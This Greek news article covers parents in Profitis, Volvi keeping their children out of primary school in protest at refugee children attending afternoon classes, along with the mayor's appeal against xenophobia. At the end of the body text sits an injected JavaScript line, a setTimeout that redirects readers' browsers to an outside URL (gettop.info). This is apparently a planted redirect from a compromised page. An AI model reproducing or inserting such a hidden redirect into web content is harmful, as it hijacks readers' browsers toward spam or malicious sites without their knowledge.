Δεν πάνε οι μαθητές στο σχολείο στη Βόλβη παρά την εισαγγελική παρέμβαση

0
8

 

Μόλις 36 από τους 130 μαθητές στο δημοτικό Προφήτη Βόλβης προσήλθαν στο μάθημα, παρά την εισαγγελικη παρέμβαση.

Οι γονείς αποφάσισαν να μην στέλνουν τα παιδιά τους στο μάθημα αντιδρώντας στη φοίτηση προσφυγόπουλων στο σχολείο, κατά τις απογευματινές ώρες.

Στο μεταξύ ο δήμαρχος Βόλβης, Διαμαντής Λιάμας, απηύθυνε έκκληση στους γονείς να συμβάλουν στην κανονικότητα της λειτουργίας του σχολείου στον Προφήτη.

«Υποστηρίζουμε ανεπιφύλακτα το δικαίωμα στη μόρφωση γι αυτά τα βασανισμένα παιδιά, που έζησαν τη φρίκη του πολέμου και την προσφυγιά. Οι κάτοικοι του Προφήτη δεν είναι ρατσιστές ούτε ξενόφοβοι, αλλά είναι γνωστοί για τη φιλοξενία τους. Αναγνωρίζουμε ότι πολλοί γονείς αντέδρασαν παρορμητικά, οδηγούμενοι τόσο από την έλλειψη ενημέρωσης, όσο και από την αυταρχική αντιμετώπισή τους υπό τον κλοιό της αστυνομίας» είπε ο κ. Λιάμας σύμφωνα με το Αθηναϊκό Πρακτορείο.

Ο δήμαρχος γνωστοποίησε ότι ο δήμος θα φροντίσει να διαλύσει και τις τελευταίες ανησυχίες των γονέων, με σειρά δράσεων, ειδικότερα για τα θέματα υγιεινής. Επιπλέον, ζήτησε δημόσια από τους γονείς να κλείσουν τα αφτιά τους, σε ακραίες φωνές που υποδαυλίζουν την ένταση. «Δυστυχώς, ορισμένοι που προέρχονται εκτός δήμου Βόλβης, προσπαθούν να εκμεταλλευτούν την έλλειψη ενημέρωσης και το κλίμα αστυνομοκρατίας, για να μετατρέψουν τις ανησυχίες των γονέων σε ξενοφοβικό ξέσπασμα» είπε και καταδίκασε απερίφραστα το περιστατικό φραστικού προπηλακισμού του διευθυντή του δημοτικού σχολείου Προφήτη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here